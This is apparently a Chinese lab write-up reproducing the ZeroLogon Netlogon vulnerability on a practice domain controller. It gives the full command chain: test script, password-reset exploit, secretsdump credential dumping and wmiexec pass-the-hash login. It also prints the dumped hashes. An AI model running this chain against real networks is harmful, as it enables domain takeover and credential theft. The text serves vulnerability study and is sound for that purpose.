1.简介
CVE-2020-1472 ZeroLogon 是微软 Netlogon 远程协议的一个特权提升漏洞,可以重置域控本身的机器密码。使用空密码登录域控,进而提升自己为域管理员。
其中 Netlogon 协议用于域内计算机验证其身份并与域控建立安全通道。为了保证安全,它使用了 AES 算法的 CFB8( 模式进行加密。AES-CFB8 模式在加密时需要一个随机的初始化向量(Initialization Vector, IV) 来确保每次加密的结果都不同。 然而,微软在实现 ComputeNetlogonCredential 函数时,错误地将 IV 硬编码为全 0(16 个 0 字节)。
由于 IV 固定为全 0,这导致了加密算法的随机性丧失。从而导致漏洞的发生。
漏洞影响版本:
• Windows Server 2008 R2 for x64-based Systems Service Pack 1
• Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
• Windows Server 2012
• Windows Server 2012 (Server Core installation)
• Windows Server 2012 R2
• Windows Server 2012 R2 (Server Core installation)
• Windows Server 2016
• Windows Server 2016 (Server Core installation)
• Windows Server 2019
• Windows Server 2019 (Server Core installation)
• Windows Server, version 1903 (Server Core installation)
• Windows Server, version 1909 (Server Core installation)
• Windows Server, version 2004 (Server Core installation)
2.漏洞复现
漏洞靶场来源:https://suhaynn.github.io
1、查看目标主机开放情况

可以看到开放了445和135端口,域主机名为 masterpc。
以下是两个脚本来进行测试:
2.1测试是否有 ZeroLogon 漏洞
链接:https://github.com/SecuraBV/CVE-2020-1472
python3 zerologon_tester.py masterpc 192.168.111.100Python
说明存在漏洞
2.2置空哈希
可以使用以下脚本:https://github.com/VoidSec/CVE-2020-1472
接下来用这个脚本来置空哈希:
python3 cve-2020-1472-exploit.py -n masterpc -t 192.168.111.100Python
2.3导出哈希
成功置空后我们来抓取hash:
./impacket-secretsdump myd.com/masterpc\$@192.168.111.100 -no-passShellScript(这里我没有找到secretsdump.py,所以去到 /usr/bin 下直接使用 impacket-secretsdump)

之后使用指定域机器账户hash来导出域管hash:
./impacket-secretsdump "myd.com/masterpc$"@192.168.111.100 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc-user "administrator"
./impacket-secretsdump myd.com/masterpc\$@192.168.111.100 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc-user "administrator"ShellScript
成功抓出域管hash:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218:::ShellScript2.4横向登录
接下来使用横向工具 wmiexec 进行登录
./impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218 myd.com/Administrator@192.168.111.100ShellScript
成功登录

Comments NOTHING